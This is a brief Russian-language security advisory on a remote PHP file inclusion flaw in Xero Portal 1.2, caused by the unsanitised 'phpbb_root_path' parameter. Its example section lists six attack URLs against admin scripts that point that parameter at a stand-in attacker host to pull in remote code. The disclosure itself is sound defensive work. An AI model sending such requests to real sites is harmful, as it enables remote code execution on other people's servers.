Программа: Xero Portal 1.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

www.[target].com/[script_pat]/admin/admin_linkdb.php?phpbb_root_path=http://evilscripts?
www.[target].com/[script_pat]/admin/admin_forum_prune.php?phpbb_root_path=http://evilscripts?
www.[target].com/[script_pat]/admin/admin_extensions.php?phpbb_root_path=http://evilscripts?
www.[target].com/[script_pat]/admin/admin_board.php?phpbb_root_path=http://evilscripts?
www.[target].com/[script_pat]/admin/admin_attachments.php?phpbb_root_path=http://evilscripts?
www.[target].com/[script_pat]/admin/admin_users.php?phpbb_root_path=http://evilscripts?

Оставить мнение